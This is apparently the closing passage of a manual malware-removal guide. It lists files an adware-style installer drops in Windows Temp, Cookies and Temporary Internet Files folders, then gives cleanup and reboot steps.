    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi94C1.tmp\inetc.dll (64 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\8PAU9PHE.txt (117 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\PXLM8U2Q.txt (115 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi94C1.tmp\583afdedde2bb_ua.exe (253391 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\318DR7NG\normal_bg[1].jpg (1633 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Internet Explorer\MSIMGSIZ.DAT (384 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\Z6N4XLNR\appImg[1].jpg (4 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\spc_player.dll (64 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\nsArray.dll (14 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\Setup__2140_il2.exe (52926 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4673.tmp (1568 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\cpSetup.exe (58228 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\1104817113 (871 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\sevensetup.exe (4705 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\NSISdl.dll (31 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi28E5.tmp\ItNP6AjIFY (165 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi28E5.tmp\System.dll (23 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi28E5.tmp\G5wycqyxwV.exe (5293 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\30EV4AVE\583afdd9a9098[1].exe (3920 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi28E5.tmp\inetc.dll (44 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\GPS1JHSL\launch_reb[1].htm (165 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi28E5.tmp\B (38534 bytes)

  4. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  5. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.
